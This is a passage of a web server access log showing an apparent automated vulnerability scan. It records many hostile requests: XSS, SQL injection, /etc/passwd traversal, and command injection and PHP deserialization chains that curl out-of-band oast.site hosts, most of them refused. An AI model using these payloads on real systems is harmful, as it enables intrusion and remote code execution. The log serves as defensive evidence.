//roUtGDQl%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/administrator/index.cfm HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /roUtGDQl%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/administrator/index.cfm HTTP/1.1" 403 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET //roUtGDQl%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/administrator/index.cfm HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /roUtGDQl%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET //roUtGDQl%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/E7FBAF" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15241.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20ct4hu7d65jrdcfcsg340erugc4gpc4ao7.oast.site%20-H%20'User-Agent%3a%20OtylIU'; HTTP/1.1" 400 0 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /log_proxy?url=http://ct4hu7d65jrdcfcsg3409dxc48en8f7nx.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh Intel Mac OS X 10.15 rv:91.0) Gecko/20100101 Firefox/91.0;" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /tutor/filter?searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /partymgr/control/getJSONuiLabelArray HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.35" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /partymgr/control/getJSONuiLabel HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /partymgr/control/getJSONuiLabel HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/122.0.1" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /partymgr/control/getJSONuiLabelArray HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.44" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /solr/admin/metrics HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /?gf_page=randomstring HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /dview8/api/usersByLevel HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.2.26" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /backend/backend/auth/signin HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.81" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /userentry?accountId=/../../../tomcat/webapps/GG71y/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.67" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /cgi-bin/quick/Ur7Nie HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /api/cors/http:%2f%2fnextchat.ct4hu7d65jrdcfcsg34035ykmtbx7oqkx.oast.site%23 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /oauth/idp/.well-known/openid-configuration HTTP/1.1" 403 146 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/XCTR.css HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/Eufr.css HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /project/switch/1?targetPath=http://oast.pro HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /signin HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /api/authentication/login HTTP/1.1" 404 548 "http://96.9.228.88:888" "Mozilla/5.0 (X11; CrOS x86_64 0.4.4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /Citrix/teststoreAuth/SamlTest HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:35.0) Gecko/20100101 Firefox/35.0" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:57 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/113.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /tagebuch/eintraege/index.html?reloaded&page=1\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Avast/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /nodes?view=summary HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Edg/93.0.961.52" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\x22__file\x22:\x22/etc%2fpasswd\x22} HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-content/backups-dup-pro/tmp/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-json/lp/v1/courses/archive-course?order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1; rv:109.0) Gecko/20100101 Firefox/122.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-content/plugins/essential-blocks/readme.txt HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /api/file/formimage HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3.1 Safari/605.1.15 RDDocuments/8.10.0.1021" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /model-versions/get-artifact?path=random&name=huJFjV&version=2 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.9" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /php/ping.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /list-editor/index.html?reloaded&page=3\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/412.5" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.9" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={\x22class\x22%3a\x22LP_Debug\x22,\x22method\x22%3a\x22var_dump\x22}&args=\x222pVJVgtqyDU4qevIgfftCQaik4A\x22 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /3/ParseSetup HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /php/ping.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /classes/common/busiFacade.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "PUT /api/2.0/mlflow-artifacts/artifacts/2pVJVrtsllM99YOyEBAulkVgsKE HTTP/1.1" 405 150 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.5.18" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1" 405 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\x22O%3a13%3a\x5Cu0022WP_HTML_Token\x5Cu0022%3a2%3a{s%3a13%3a\x5Cu0022bookmark_name\x5Cu0022%3bs%3a64%3a\x5Cu0022curl+ct4hu7d65jrdcfcsg3403jqx3y4xep4sg.oast.site/?ftCQaik4A2pVJV\x5Cu0022%3bs%3a10%3a\x5Cu0022on_destroy\x5Cu0022%3bs%3a6%3a\x5Cu0022system\x5Cu0022%3b}\x22 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /lists/compact/index.html?reloaded&sort=date_desc&page=2\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/601.5.3 (KHTML, like Gecko) Version/9.1.2 Safari/601.5.3" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-json/post-smtp/v1/get-log HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={\x22class\x22:\x22LP_Helper\x22,\x22method\x22:\x22maybe_unserialize\x22}&args=\x22O%3a8%3a\x5Cu0022WP_Theme\x5Cu0022%3a2%3a{s%3a7%3a\x5Cu0022headers\x5Cu0022%3bO%3a13%3a\x5Cu0022WP_Block_List\x5Cu0022%3a2%3a{s%3a6%3a\x5Cu0022blocks\x5Cu0022%3ba%3a1%3a{s%3a4%3a\x5Cu0022Name\x5Cu0022%3ba%3a1%3a{s%3a9%3a\x5Cu0022blockName\x5Cu0022%3bs%3a12%3a\x5Cu0022Parent+Theme\x5Cu0022%3b}}s%3a8%3a\x5Cu0022registry\x5Cu0022%3bO%3a22%3a\x5Cu0022WP_Block_Type_Registry\x5Cu0022%3a1%3a{s%3a22%3a\x5Cu0022registered_block_types\x5Cu0022%3bO%3a8%3a\x5Cu0022WP_Theme\x5Cu0022%3a2%3a{s%3a7%3a\x5Cu0022headers\x5Cu0022%3bN%3bs%3a6%3a\x5Cu0022parent\x5Cu0022%3bO%3a22%3a\x5Cu0022WpOrg\x5C\x5CRequests\x5C\x5CSession\x5Cu0022%3a3%3a{s%3a3%3a\x5Cu0022url\x5Cu0022%3bs%3a10%3a\x5Cu0022http%3a//p%3a0\x5Cu0022%3bs%3a7%3a\x5Cu0022headers\x5Cu0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\x5Cu0022curl+ct4hu7d65jrdcfcsg340yh456krhfnick.oast.site/?ftCQaik4A2pVJV\x5Cu0022%3b}s%3a7%3a\x5Cu0022options\x5Cu0022%3ba%3a1%3a{s%3a5%3a\x5Cu0022hooks\x5Cu0022%3bO%3a20%3a\x5Cu0022WpOrg\x5C\x5CRequests\x5C\x5CHooks\x5Cu0022%3a1%3a{s%3a5%3a\x5Cu0022hooks\x5Cu0022%3ba%3a1%3a{s%3a23%3a\x5Cu0022requests.before_request\x5Cu0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\x5Cu0022WpOrg\x5C\x5CRequests\x5C\x5CHooks\x5Cu0022%3a1%3a{s%3a5%3a\x5Cu0022hooks\x5Cu0022%3ba%3a1%3a{s%3a15%3a\x5Cu0022http%3a//p%3a0/Name\x5Cu0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\x5Cu0022system\x5Cu0022%3b}}}}i%3a1%3bs%3a8%3a\x5Cu0022dispatch\x5Cu0022%3b}}}}}}}}}}s%3a6%3a\x5Cu0022parent\x5Cu0022%3bN%3b}\x22 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.4" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /model-versions/get-artifact?name=2pVJVvzjr4w5t4CBdu5mYQ5ZJIm&path=etc%2Fpasswd&version=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /lists/elaborate/index.html?reloaded&sort=date_desc&page=2\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /lists/masonry/index.html?reloaded&sort=date_asc&page=2\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /blog/articles/index.html?reloaded&page=2\x22>%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0" 172.18.0.4 - - [29/Nov/2024:09:56:58 +0800] "GET /advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842&InputField-61939054842=1&captcha_token_id=1\x22>